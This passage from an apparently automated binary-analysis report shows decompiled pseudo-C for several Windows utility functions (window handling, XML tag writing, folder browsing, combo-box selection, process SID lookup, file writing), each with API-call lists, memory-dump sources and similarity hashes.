                                                                                                                                                                                                                          					}
                                                                                                                                                                                                                          				}
                                                                                                                                                                                                                          				return CallWindowProcW( *0x40f2f0, _a4, _a8, _a12, _a16);
                                                                                                                                                                                                                          			}





                                                                                                                                                                                                                          APIs
                                                                                                                                                                                                                          • GetKeyState.USER32(000000A2), ref: 00403A8C
                                                                                                                                                                                                                            • Part of subcall function 00403A60: GetKeyState.USER32(?), ref: 00403A64
                                                                                                                                                                                                                          • SendMessageW.USER32(?,000000B1,00000000,000000FF), ref: 00403AF4
                                                                                                                                                                                                                          • CallWindowProcW.USER32(?,00000100,?,?), ref: 00403B0C
                                                                                                                                                                                                                          Strings
                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                          • Source File: 00000007.00000002.696565923.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                          • Associated: 00000007.00000002.696557626.0000000000400000.00000002.00020000.sdmp
                                                                                                                                                                                                                          • Associated: 00000007.00000002.696575204.000000000040C000.00000002.00020000.sdmp
                                                                                                                                                                                                                          • Associated: 00000007.00000002.696581527.000000000040F000.00000004.00020000.sdmp
                                                                                                                                                                                                                          • Associated: 00000007.00000002.696588488.000000000041D000.00000002.00020000.sdmp
                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                          • API ID: State$CallMessageProcSendWindow
                                                                                                                                                                                                                          • String ID: A
                                                                                                                                                                                                                          • API String ID: 3924021322-3554254475
                                                                                                                                                                                                                          • Opcode ID: 7a91954c753d57b62ada695ad1095f0bf88fde31d04a203a00175be824b18610
                                                                                                                                                                                                                          • Instruction ID: 3f4bab65c8f2f559ff61c6136e8e970ba349fdfc906a465d58382778652fa82c
                                                                                                                                                                                                                          • Opcode Fuzzy Hash: 7a91954c753d57b62ada695ad1095f0bf88fde31d04a203a00175be824b18610
                                                                                                                                                                                                                          • Instruction Fuzzy Hash: AC01483130430AAEFF11DFE59D02ADA3A5CAF15327F114036FA96B81D1DBB887506E59
                                                                                                                                                                                                                          Uniqueness

                                                                                                                                                                                                                          Uniqueness Score: -1.00%

                                                                                                                                                                                                                          C-Code - Quality: 91%
                                                                                                                                                                                                                          			E004034F0(void* __ecx, void* __eflags, intOrPtr* _a4) {
                                                                                                                                                                                                                          				intOrPtr _v20;
                                                                                                                                                                                                                          				char _v1072;
                                                                                                                                                                                                                          				void _v3672;
                                                                                                                                                                                                                          				char _v4496;
                                                                                                                                                                                                                          				intOrPtr _v4556;
                                                                                                                                                                                                                          				char _v4560;
                                                                                                                                                                                                                          				void* __edi;
                                                                                                                                                                                                                          				void* __esi;
                                                                                                                                                                                                                          				intOrPtr* _t41;
                                                                                                                                                                                                                          				void* _t45;
                                                                                                                                                                                                                          
                                                                                                                                                                                                                          				_t45 = __eflags;
                                                                                                                                                                                                                          				E0040B550(0x11cc, __ecx);
                                                                                                                                                                                                                          				E00402923( &_v4560);
                                                                                                                                                                                                                          				_v4560 = 0x40db44;
                                                                                                                                                                                                                          				E00406670( &_v4496, _t45);
                                                                                                                                                                                                                          				_v4496 = 0x40dab0;
                                                                                                                                                                                                                          				memset( &_v3672, 0, 0x10);
                                                                                                                                                                                                                          				E0040A909( &_v1072);
                                                                                                                                                                                                                          				_t41 = _a4;
                                                                                                                                                                                                                          				_v4556 = 0x71;
                                                                                                                                                                                                                          				if(E00402CD5( &_v4560,  *((intOrPtr*)(_t41 + 0x10))) != 0) {
                                                                                                                                                                                                                          					L0040B266();
                                                                                                                                                                                                                          					 *((intOrPtr*)( *_t41 + 4))(1, _v20, _t41 + 0x5b2c, 0xa);
                                                                                                                                                                                                                          				}
                                                                                                                                                                                                                          				_v4496 = 0x40dab0;
                                                                                                                                                                                                                          				_v4560 = 0x40db44;
                                                                                                                                                                                                                          				E004067AC( &_v4496);
                                                                                                                                                                                                                          				return E00402940( &_v4560);
                                                                                                                                                                                                                          			}














                                                                                                                                                                                                                          APIs
                                                                                                                                                                                                                            • Part of subcall function 00402923: memset.MSVCRT ref: 00402935
                                                                                                                                                                                                                            • Part of subcall function 00406670: ??2@YAPAXI@Z.MSVCRT ref: 004066B9
                                                                                                                                                                                                                            • Part of subcall function 00406670: ??2@YAPAXI@Z.MSVCRT ref: 004066E0
                                                                                                                                                                                                                            • Part of subcall function 00406670: ??2@YAPAXI@Z.MSVCRT ref: 00406701
                                                                                                                                                                                                                            • Part of subcall function 00406670: ??2@YAPAXI@Z.MSVCRT ref: 00406722
                                                                                                                                                                                                                          • memset.MSVCRT ref: 00403537
                                                                                                                                                                                                                          • _ultow.MSVCRT ref: 00403575
                                                                                                                                                                                                                          Strings
                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                          • Source File: 00000007.00000002.696565923.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                          • Associated: 00000007.00000002.696557626.0000000000400000.00000002.00020000.sdmp
                                                                                                                                                                                                                          • Associated: 00000007.00000002.696575204.000000000040C000.00000002.00020000.sdmp
                                                                                                                                                                                                                          • Associated: 00000007.00000002.696581527.000000000040F000.00000004.00020000.sdmp
                                                                                                                                                                                                                          • Associated: 00000007.00000002.696588488.000000000041D000.00000002.00020000.sdmp
                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                          • API ID: ??2@$memset$_ultow
                                                                                                                                                                                                                          • String ID: cf@$q
                                                                                                                                                                                                                          • API String ID: 3448780718-2693627795
                                                                                                                                                                                                                          • Opcode ID: 5a770fb105266b5f281bf636f392918a38755f6c8491aba89f246a667f584aac
                                                                                                                                                                                                                          • Instruction ID: aa1ed1bb2df2d11c17fc3d40a8ec787ac421495c908f782690464d4e039b4fd8
                                                                                                                                                                                                                          • Opcode Fuzzy Hash: 5a770fb105266b5f281bf636f392918a38755f6c8491aba89f246a667f584aac
                                                                                                                                                                                                                          • Instruction Fuzzy Hash: 73113079A402186ACB24AB55DC41BCDB7B4AF45304F0084BAEB09771C1D7796E888FD8
                                                                                                                                                                                                                          Uniqueness

                                                                                                                                                                                                                          Uniqueness Score: -1.00%

                                                                                                                                                                                                                          C-Code - Quality: 64%
                                                                                                                                                                                                                          			E00407E24(intOrPtr* __ecx, intOrPtr _a4) {
                                                                                                                                                                                                                          				void _v514;
                                                                                                                                                                                                                          				signed short _v516;
                                                                                                                                                                                                                          				void _v1026;
                                                                                                                                                                                                                          				signed short _v1028;
                                                                                                                                                                                                                          				void* __esi;
                                                                                                                                                                                                                          				void* _t17;
                                                                                                                                                                                                                          				intOrPtr* _t26;
                                                                                                                                                                                                                          				signed short* _t28;
                                                                                                                                                                                                                          
                                                                                                                                                                                                                          				_v516 = _v516 & 0x00000000;
                                                                                                                                                                                                                          				_t26 = __ecx;
                                                                                                                                                                                                                          				memset( &_v514, 0, 0x1fc);
                                                                                                                                                                                                                          				_v1028 = _v1028 & 0x00000000;
                                                                                                                                                                                                                          				memset( &_v1026, 0, 0x1fc);
                                                                                                                                                                                                                          				_t17 =  *((intOrPtr*)( *_t26 + 0x24))();
                                                                                                                                                                                                                          				_t28 =  &_v516;
                                                                                                                                                                                                                          				E00407250(_t28, _t17);
                                                                                                                                                                                                                          				_push(_t28);
                                                                                                                                                                                                                          				_push(L"</%s>\r\n");
                                                                                                                                                                                                                          				_push(0xff);
                                                                                                                                                                                                                          				_push( &_v1028);
                                                                                                                                                                                                                          				L0040B1EC();
                                                                                                                                                                                                                          				return E00407343(_t26, _a4,  &_v1028);
                                                                                                                                                                                                                          			}












                                                                                                                                                                                                                          APIs
                                                                                                                                                                                                                          • memset.MSVCRT ref: 00407E48
                                                                                                                                                                                                                          • memset.MSVCRT ref: 00407E5F
                                                                                                                                                                                                                            • Part of subcall function 00407250: wcscpy.MSVCRT ref: 00407255
                                                                                                                                                                                                                            • Part of subcall function 00407250: _wcslwr.MSVCRT ref: 00407288
                                                                                                                                                                                                                          • _snwprintf.MSVCRT ref: 00407E8E
                                                                                                                                                                                                                          Strings
                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                          • Source File: 00000007.00000002.696565923.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                          • Associated: 00000007.00000002.696557626.0000000000400000.00000002.00020000.sdmp
                                                                                                                                                                                                                          • Associated: 00000007.00000002.696575204.000000000040C000.00000002.00020000.sdmp
                                                                                                                                                                                                                          • Associated: 00000007.00000002.696581527.000000000040F000.00000004.00020000.sdmp
                                                                                                                                                                                                                          • Associated: 00000007.00000002.696588488.000000000041D000.00000002.00020000.sdmp
                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                          • API ID: memset$_snwprintf_wcslwrwcscpy
                                                                                                                                                                                                                          • String ID: </%s>
                                                                                                                                                                                                                          • API String ID: 3400436232-259020660
                                                                                                                                                                                                                          • Opcode ID: 8ed6d9153b8ab756a1282c4525cb1f33682d7d4062ac2741ec7bca21e753fd7d
                                                                                                                                                                                                                          • Instruction ID: 202c728a503fdded71e402cbdefdfedacf6d04e10f6749ebe2a15fa747ba2321
                                                                                                                                                                                                                          • Opcode Fuzzy Hash: 8ed6d9153b8ab756a1282c4525cb1f33682d7d4062ac2741ec7bca21e753fd7d
                                                                                                                                                                                                                          • Instruction Fuzzy Hash: 820186B2D4012966D720A795CC46FEE766CEF44318F0004FABB08F71C2DB78AB458AD8
                                                                                                                                                                                                                          Uniqueness

                                                                                                                                                                                                                          Uniqueness Score: -1.00%

                                                                                                                                                                                                                          C-Code - Quality: 77%
                                                                                                                                                                                                                          			E00405E0A(intOrPtr __ecx, void* __eflags, struct HWND__* _a4) {
                                                                                                                                                                                                                          				void _v8198;
                                                                                                                                                                                                                          				short _v8200;
                                                                                                                                                                                                                          				void* _t9;
                                                                                                                                                                                                                          				void* _t12;
                                                                                                                                                                                                                          				intOrPtr _t19;
                                                                                                                                                                                                                          				intOrPtr _t20;
                                                                                                                                                                                                                          
                                                                                                                                                                                                                          				_t19 = __ecx;
                                                                                                                                                                                                                          				_t9 = E0040B550(0x2004, __ecx);
                                                                                                                                                                                                                          				_t20 = _t19;
                                                                                                                                                                                                                          				if(_t20 == 0) {
                                                                                                                                                                                                                          					_t20 =  *0x40fe24; // 0x0
                                                                                                                                                                                                                          				}
                                                                                                                                                                                                                          				_t25 =  *0x40fb90;
                                                                                                                                                                                                                          				if( *0x40fb90 != 0) {
                                                                                                                                                                                                                          					_v8200 = _v8200 & 0x00000000;
                                                                                                                                                                                                                          					memset( &_v8198, 0, 0x2000);
                                                                                                                                                                                                                          					_push(_t20);
                                                                                                                                                                                                                          					_t12 = 5;
                                                                                                                                                                                                                          					E00405E8D(_t12);
                                                                                                                                                                                                                          					if(E00405F39(_t19, _t25, L"caption",  &_v8200) != 0) {
                                                                                                                                                                                                                          						SetWindowTextW(_a4,  &_v8200);
                                                                                                                                                                                                                          					}
                                                                                                                                                                                                                          					return EnumChildWindows(_a4, E00405DAC, 0);
                                                                                                                                                                                                                          				}
                                                                                                                                                                                                                          				return _t9;
                                                                                                                                                                                                                          			}










                                                                                                                                                                                                                          APIs
                                                                                                                                                                                                                          Strings
                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                          • Source File: 00000007.00000002.696565923.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                          • Associated: 00000007.00000002.696557626.0000000000400000.00000002.00020000.sdmp
                                                                                                                                                                                                                          • Associated: 00000007.00000002.696575204.000000000040C000.00000002.00020000.sdmp
                                                                                                                                                                                                                          • Associated: 00000007.00000002.696581527.000000000040F000.00000004.00020000.sdmp
                                                                                                                                                                                                                          • Associated: 00000007.00000002.696588488.000000000041D000.00000002.00020000.sdmp
                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                          • API ID: ChildEnumTextWindowWindowsmemset
                                                                                                                                                                                                                          • String ID: caption
                                                                                                                                                                                                                          • API String ID: 1523050162-4135340389
                                                                                                                                                                                                                          • Opcode ID: 8feeb8209b6c70e9adfa8bd3f92da79707fac4aecb0355a736b6ddf0df3d27b2
                                                                                                                                                                                                                          • Instruction ID: ff9fcce37bd20e8a069aa1bb12297d26d3abb42d57bfe77991e9b0a8e19eae59
                                                                                                                                                                                                                          • Opcode Fuzzy Hash: 8feeb8209b6c70e9adfa8bd3f92da79707fac4aecb0355a736b6ddf0df3d27b2
                                                                                                                                                                                                                          • Instruction Fuzzy Hash: 2DF04432940718AAEB20AB54DD4EB9B3668DB04754F0041B7BA04B61D2D7B8AE40CEDC
                                                                                                                                                                                                                          Uniqueness

                                                                                                                                                                                                                          Uniqueness Score: -1.00%

                                                                                                                                                                                                                          C-Code - Quality: 100%
                                                                                                                                                                                                                          			E00409A46(struct HINSTANCE__** __eax, intOrPtr _a4, intOrPtr _a8, intOrPtr _a12, intOrPtr _a16, intOrPtr _a20) {
                                                                                                                                                                                                                          				struct HINSTANCE__* _t11;
                                                                                                                                                                                                                          				struct HINSTANCE__** _t14;
                                                                                                                                                                                                                          				struct HINSTANCE__* _t15;
                                                                                                                                                                                                                          
                                                                                                                                                                                                                          				_t14 = __eax;
                                                                                                                                                                                                                          				if( *((intOrPtr*)(__eax)) == 0) {
                                                                                                                                                                                                                          					_t11 = E00405436(L"winsta.dll");
                                                                                                                                                                                                                          					 *_t14 = _t11;
                                                                                                                                                                                                                          					if(_t11 != 0) {
                                                                                                                                                                                                                          						_t14[1] = GetProcAddress(_t11, "WinStationGetProcessSid");
                                                                                                                                                                                                                          					}
                                                                                                                                                                                                                          				}
                                                                                                                                                                                                                          				_t15 = _t14[1];
                                                                                                                                                                                                                          				if(_t15 == 0) {
                                                                                                                                                                                                                          					return 0;
                                                                                                                                                                                                                          				} else {
                                                                                                                                                                                                                          					return _t15->i(0, _a4, _a16, _a20, _a8, _a12);
                                                                                                                                                                                                                          				}
                                                                                                                                                                                                                          			}







                                                                                                                                                                                                                          APIs
                                                                                                                                                                                                                            • Part of subcall function 00405436: memset.MSVCRT ref: 00405456
                                                                                                                                                                                                                            • Part of subcall function 00405436: wcscat.MSVCRT ref: 00405478
                                                                                                                                                                                                                            • Part of subcall function 00405436: LoadLibraryW.KERNELBASE(00000000), ref: 00405489
                                                                                                                                                                                                                            • Part of subcall function 00405436: LoadLibraryW.KERNEL32(?), ref: 00405492
                                                                                                                                                                                                                          • GetProcAddress.KERNEL32(00000000,WinStationGetProcessSid), ref: 00409A68
                                                                                                                                                                                                                          Strings
                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                          • Source File: 00000007.00000002.696565923.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                          • Associated: 00000007.00000002.696557626.0000000000400000.00000002.00020000.sdmp
                                                                                                                                                                                                                          • Associated: 00000007.00000002.696575204.000000000040C000.00000002.00020000.sdmp
                                                                                                                                                                                                                          • Associated: 00000007.00000002.696581527.000000000040F000.00000004.00020000.sdmp
                                                                                                                                                                                                                          • Associated: 00000007.00000002.696588488.000000000041D000.00000002.00020000.sdmp
                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                          • API ID: LibraryLoad$AddressProcmemsetwcscat
                                                                                                                                                                                                                          • String ID: WinStationGetProcessSid$winsta.dll$Y@
                                                                                                                                                                                                                          • API String ID: 946536540-379566740
                                                                                                                                                                                                                          • Opcode ID: 1b7ebfe453553e3f98933d91fdad94fbea9a23791565fec376d5a3071c2edda0
                                                                                                                                                                                                                          • Instruction ID: f8fd4ca1437852706c932511ef9fc121d1f4ef25cad53c4396aefa54a2cc69ea
                                                                                                                                                                                                                          • Opcode Fuzzy Hash: 1b7ebfe453553e3f98933d91fdad94fbea9a23791565fec376d5a3071c2edda0
                                                                                                                                                                                                                          • Instruction Fuzzy Hash: 4AF08236644219AFCF219FE09C01B977BD5AB08710F00443AF945B21D1D67588509F98
                                                                                                                                                                                                                          Uniqueness

                                                                                                                                                                                                                          Uniqueness Score: -1.00%

                                                                                                                                                                                                                          C-Code - Quality: 93%
                                                                                                                                                                                                                          			E0040588E(void** __esi, intOrPtr _a4, intOrPtr _a8) {
                                                                                                                                                                                                                          				signed int _t21;
                                                                                                                                                                                                                          				signed int _t23;
                                                                                                                                                                                                                          				void* _t24;
                                                                                                                                                                                                                          				signed int _t31;
                                                                                                                                                                                                                          				void* _t33;
                                                                                                                                                                                                                          				void* _t44;
                                                                                                                                                                                                                          				signed int _t46;
                                                                                                                                                                                                                          				void* _t48;
                                                                                                                                                                                                                          				signed int _t51;
                                                                                                                                                                                                                          				int _t52;
                                                                                                                                                                                                                          				void** _t53;
                                                                                                                                                                                                                          				void* _t58;
                                                                                                                                                                                                                          
                                                                                                                                                                                                                          				_t53 = __esi;
                                                                                                                                                                                                                          				_t1 =  &(_t53[1]); // 0x0
                                                                                                                                                                                                                          				_t51 =  *_t1;
                                                                                                                                                                                                                          				_t21 = 0;
                                                                                                                                                                                                                          				if(_t51 <= 0) {
                                                                                                                                                                                                                          					L4:
                                                                                                                                                                                                                          					_t2 =  &(_t53[2]); // 0x8
                                                                                                                                                                                                                          					_t33 =  *_t53;
                                                                                                                                                                                                                          					_t23 =  *_t2 + _t51;
                                                                                                                                                                                                                          					_t46 = 8;
                                                                                                                                                                                                                          					_t53[1] = _t23;
                                                                                                                                                                                                                          					_t24 = _t23 * _t46;
                                                                                                                                                                                                                          					_push( ~(0 | _t58 > 0x00000000) | _t24);
                                                                                                                                                                                                                          					L0040B26C();
                                                                                                                                                                                                                          					_t10 =  &(_t53[1]); // 0x0
                                                                                                                                                                                                                          					 *_t53 = _t24;
                                                                                                                                                                                                                          					memset(_t24, 0,  *_t10 << 3);
                                                                                                                                                                                                                          					_t52 = _t51 << 3;
                                                                                                                                                                                                                          					memcpy( *_t53, _t33, _t52);
                                                                                                                                                                                                                          					if(_t33 != 0) {
                                                                                                                                                                                                                          						_push(_t33);
                                                                                                                                                                                                                          						L0040B272();
                                                                                                                                                                                                                          					}
                                                                                                                                                                                                                          					 *((intOrPtr*)( *_t53 + _t52)) = _a4;
                                                                                                                                                                                                                          					 *((intOrPtr*)(_t52 +  *_t53 + 4)) = _a8;
                                                                                                                                                                                                                          				} else {
                                                                                                                                                                                                                          					_t44 =  *__esi;
                                                                                                                                                                                                                          					_t48 = _t44;
                                                                                                                                                                                                                          					while( *_t48 != 0) {
                                                                                                                                                                                                                          						_t21 = _t21 + 1;
                                                                                                                                                                                                                          						_t48 = _t48 + 8;
                                                                                                                                                                                                                          						_t58 = _t21 - _t51;
                                                                                                                                                                                                                          						if(_t58 < 0) {
                                                                                                                                                                                                                          							continue;
                                                                                                                                                                                                                          						} else {
                                                                                                                                                                                                                          							goto L4;
                                                                                                                                                                                                                          						}
                                                                                                                                                                                                                          						goto L7;
                                                                                                                                                                                                                          					}
                                                                                                                                                                                                                          					_t31 = _t21 << 3;
                                                                                                                                                                                                                          					 *((intOrPtr*)(_t44 + _t31)) = _a4;
                                                                                                                                                                                                                          					 *((intOrPtr*)(_t31 +  *_t53 + 4)) = _a8;
                                                                                                                                                                                                                          				}
                                                                                                                                                                                                                          				L7:
                                                                                                                                                                                                                          				return 1;
                                                                                                                                                                                                                          			}
















                                                                                                                                                                                                                          APIs
                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                          • Source File: 00000007.00000002.696565923.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                          • Associated: 00000007.00000002.696557626.0000000000400000.00000002.00020000.sdmp
                                                                                                                                                                                                                          • Associated: 00000007.00000002.696575204.000000000040C000.00000002.00020000.sdmp
                                                                                                                                                                                                                          • Associated: 00000007.00000002.696581527.000000000040F000.00000004.00020000.sdmp
                                                                                                                                                                                                                          • Associated: 00000007.00000002.696588488.000000000041D000.00000002.00020000.sdmp
                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                          • API ID: ??2@??3@memcpymemset
                                                                                                                                                                                                                          • String ID:
                                                                                                                                                                                                                          • API String ID: 1865533344-0
                                                                                                                                                                                                                          • Opcode ID: 842e7f25b611a1b365b40b1c94d0ccd91a374462c013338e9ea48621bac1a915
                                                                                                                                                                                                                          • Instruction ID: bfbe461037e943c94cde62efea7f8de8011d206b5eb27adb1998baad11e83e26
                                                                                                                                                                                                                          • Opcode Fuzzy Hash: 842e7f25b611a1b365b40b1c94d0ccd91a374462c013338e9ea48621bac1a915
                                                                                                                                                                                                                          • Instruction Fuzzy Hash: 9F116A722046019FD328DF2DC881A2BF7E5EFD8300B248C2EE49A97395DB35E801CB58
                                                                                                                                                                                                                          Uniqueness

                                                                                                                                                                                                                          Uniqueness Score: -1.00%

                                                                                                                                                                                                                          C-Code - Quality: 37%
                                                                                                                                                                                                                          			E0040ACFC(wchar_t* __esi, char _a4, intOrPtr _a8) {
                                                                                                                                                                                                                          				void* _v8;
                                                                                                                                                                                                                          				wchar_t* _v16;
                                                                                                                                                                                                                          				intOrPtr _v20;
                                                                                                                                                                                                                          				intOrPtr _v24;
                                                                                                                                                                                                                          				intOrPtr _v28;
                                                                                                                                                                                                                          				intOrPtr _v32;
                                                                                                                                                                                                                          				intOrPtr _v36;
                                                                                                                                                                                                                          				char _v40;
                                                                                                                                                                                                                          				long _v564;
                                                                                                                                                                                                                          				char* _t18;
                                                                                                                                                                                                                          				char* _t22;
                                                                                                                                                                                                                          				wchar_t* _t23;
                                                                                                                                                                                                                          				intOrPtr* _t24;
                                                                                                                                                                                                                          				intOrPtr* _t26;
                                                                                                                                                                                                                          				intOrPtr _t30;
                                                                                                                                                                                                                          				void* _t35;
                                                                                                                                                                                                                          				char* _t36;
                                                                                                                                                                                                                          
                                                                                                                                                                                                                          				_t18 =  &_v8;
                                                                                                                                                                                                                          				_t30 = 0;
                                                                                                                                                                                                                          				__imp__SHGetMalloc(_t18);
                                                                                                                                                                                                                          				if(_t18 >= 0) {
                                                                                                                                                                                                                          					_v40 = _a4;
                                                                                                                                                                                                                          					_v28 = _a8;
                                                                                                                                                                                                                          					_t22 =  &_v40;
                                                                                                                                                                                                                          					_v36 = 0;
                                                                                                                                                                                                                          					_v32 = 0;
                                                                                                                                                                                                                          					_v24 = 4;
                                                                                                                                                                                                                          					_v20 = E0040AC81;
                                                                                                                                                                                                                          					_v16 = __esi;
                                                                                                                                                                                                                          					__imp__SHBrowseForFolderW(_t22, _t35);
                                                                                                                                                                                                                          					_t36 = _t22;
                                                                                                                                                                                                                          					if(_t36 != 0) {
                                                                                                                                                                                                                          						_t23 =  &_v564;
                                                                                                                                                                                                                          						__imp__SHGetPathFromIDListW(_t36, _t23);
                                                                                                                                                                                                                          						if(_t23 != 0) {
                                                                                                                                                                                                                          							_t30 = 1;
                                                                                                                                                                                                                          							wcscpy(__esi,  &_v564);
                                                                                                                                                                                                                          						}
                                                                                                                                                                                                                          						_t24 = _v8;
                                                                                                                                                                                                                          						 *((intOrPtr*)( *_t24 + 0x14))(_t24, _t36);
                                                                                                                                                                                                                          						_t26 = _v8;
                                                                                                                                                                                                                          						 *((intOrPtr*)( *_t26 + 8))(_t26);
                                                                                                                                                                                                                          					}
                                                                                                                                                                                                                          				}
                                                                                                                                                                                                                          				return _t30;
                                                                                                                                                                                                                          			}

                                                                                                                                                                                                                          APIs
                                                                                                                                                                                                                          • SHGetMalloc.SHELL32(?), ref: 0040AD0C
                                                                                                                                                                                                                          • SHBrowseForFolderW.SHELL32(?), ref: 0040AD3E
                                                                                                                                                                                                                          • SHGetPathFromIDListW.SHELL32(00000000,?), ref: 0040AD52
                                                                                                                                                                                                                          • wcscpy.MSVCRT ref: 0040AD65
                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                          • Source File: 00000007.00000002.696565923.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
• Associated: 00000007.00000002.696557626.0000000000400000.00000002.00020000.sdmp
• Associated: 00000007.00000002.696575204.000000000040C000.00000002.00020000.sdmp
• Associated: 00000007.00000002.696581527.000000000040F000.00000004.00020000.sdmp
• Associated: 00000007.00000002.696588488.000000000041D000.00000002.00020000.sdmp
                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                          • API ID: BrowseFolderFromListMallocPathwcscpy
                                                                                                                                                                                                                          • String ID:
                                                                                                                                                                                                                          • API String ID: 3917621476-0
                                                                                                                                                                                                                          • Opcode ID: 2a6e8ca006a625361a9e73932945a98b974e7be3bf153fbb13282c81ef302996
                                                                                                                                                                                                                          • Instruction ID: e4c3f7e47c5e56e8be22c5f757262c1ae757d72ab7f138bc7c026954c7aa5c2b
                                                                                                                                                                                                                          • Opcode Fuzzy Hash: 2a6e8ca006a625361a9e73932945a98b974e7be3bf153fbb13282c81ef302996
                                                                                                                                                                                                                          • Instruction Fuzzy Hash: B011FAB5900208EFDB10EFA9D9889AEB7F8FF48300F10416AE905E7240D738DA05CFA5
                                                                                                                                                                                                                          Uniqueness

                                                                                                                                                                                                                          Uniqueness Score: -1.00%

                                                                                                                                                                                                                          C-Code - Quality: 100%
                                                                                                                                                                                                                          			E00404A44(void* __ecx, struct HWND__* _a4, int _a8, intOrPtr _a12) {
                                                                                                                                                                                                                          				long _v8;
                                                                                                                                                                                                                          				long _v12;
                                                                                                                                                                                                                          				long _t13;
                                                                                                                                                                                                                          				void* _t14;
                                                                                                                                                                                                                          				struct HWND__* _t24;
                                                                                                                                                                                                                          
                                                                                                                                                                                                                          				_t24 = GetDlgItem(_a4, _a8);
                                                                                                                                                                                                                          				_t13 = SendMessageW(_t24, 0x146, 0, 0);
                                                                                                                                                                                                                          				_v12 = _t13;
                                                                                                                                                                                                                          				_v8 = 0;
                                                                                                                                                                                                                          				if(_t13 <= 0) {
                                                                                                                                                                                                                          					L3:
                                                                                                                                                                                                                          					_t14 = 0;
                                                                                                                                                                                                                          				} else {
                                                                                                                                                                                                                          					while(SendMessageW(_t24, 0x150, _v8, 0) != _a12) {
                                                                                                                                                                                                                          						_v8 = _v8 + 1;
                                                                                                                                                                                                                          						if(_v8 < _v12) {
                                                                                                                                                                                                                          							continue;
                                                                                                                                                                                                                          						} else {
                                                                                                                                                                                                                          							goto L3;
                                                                                                                                                                                                                          						}
                                                                                                                                                                                                                          						goto L4;
                                                                                                                                                                                                                          					}
                                                                                                                                                                                                                          					SendMessageW(_t24, 0x14e, _v8, 0);
                                                                                                                                                                                                                          					_t14 = 1;
                                                                                                                                                                                                                          				}
                                                                                                                                                                                                                          				L4:
                                                                                                                                                                                                                          				return _t14;
                                                                                                                                                                                                                          			}

                                                                                                                                                                                                                          APIs
                                                                                                                                                                                                                          • GetDlgItem.USER32 ref: 00404A52
                                                                                                                                                                                                                          • SendMessageW.USER32(00000000,00000146,00000000,00000000), ref: 00404A6A
                                                                                                                                                                                                                          • SendMessageW.USER32(00000000,00000150,00000000,00000000), ref: 00404A80
                                                                                                                                                                                                                          • SendMessageW.USER32(00000000,0000014E,00000000,00000000), ref: 00404AA3
                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                          • Source File: 00000007.00000002.696565923.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                          • Associated: 00000007.00000002.696557626.0000000000400000.00000002.00020000.sdmp
                                                                                                                                                                                                                          • Associated: 00000007.00000002.696575204.000000000040C000.00000002.00020000.sdmp
                                                                                                                                                                                                                          • Associated: 00000007.00000002.696581527.000000000040F000.00000004.00020000.sdmp
                                                                                                                                                                                                                          • Associated: 00000007.00000002.696588488.000000000041D000.00000002.00020000.sdmp
                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                          • API ID: MessageSend$Item
                                                                                                                                                                                                                          • String ID:
                                                                                                                                                                                                                          • API String ID: 3888421826-0
                                                                                                                                                                                                                          • Opcode ID: 8e654b4fb51c2e6e0140a28d1ff35be7b55d0d95af2e0242a2f6fa2b8df4bf67
                                                                                                                                                                                                                          • Instruction ID: a803108f18d13bdb161ef9cfeaea96f484be20865a03d7d0c1e8cd60aac843f5
                                                                                                                                                                                                                          • Opcode Fuzzy Hash: 8e654b4fb51c2e6e0140a28d1ff35be7b55d0d95af2e0242a2f6fa2b8df4bf67
                                                                                                                                                                                                                          • Instruction Fuzzy Hash: 02F01DB1A4010CFEEB018FD59DC1DAF7BBDEB89755F104479F604E6150D2709E41AB64
                                                                                                                                                                                                                          Uniqueness

                                                                                                                                                                                                                          Uniqueness Score: -1.00%

                                                                                                                                                                                                                          C-Code - Quality: 93%
                                                                                                                                                                                                                          			E004072D8(void* __ecx, void* __eflags, void* _a4, short* _a8) {
                                                                                                                                                                                                                          				long _v8;
                                                                                                                                                                                                                          				void _v8199;
                                                                                                                                                                                                                          				char _v8200;
                                                                                                                                                                                                                          
                                                                                                                                                                                                                          				E0040B550(0x2004, __ecx);
                                                                                                                                                                                                                          				_v8200 = 0;
                                                                                                                                                                                                                          				memset( &_v8199, 0, 0x1fff);
                                                                                                                                                                                                                          				WideCharToMultiByte(0, 0, _a8, 0xffffffff,  &_v8200, 0x1fff, 0, 0);
                                                                                                                                                                                                                          				return WriteFile(_a4,  &_v8200, strlen( &_v8200),  &_v8, 0);
                                                                                                                                                                                                                          			}







                                                                                                                                                                                                                          APIs
                                                                                                                                                                                                                          • memset.MSVCRT ref: 004072FD
                                                                                                                                                                                                                          • WideCharToMultiByte.KERNEL32(00000000,00000000,?,000000FF,?,00001FFF,00000000,00000000), ref: 00407316
                                                                                                                                                                                                                          • strlen.MSVCRT ref: 00407328
                                                                                                                                                                                                                          • WriteFile.KERNEL32(?,?,00000000,?,00000000), ref: 00407339
                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                          • Source File: 00000007.00000002.696565923.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
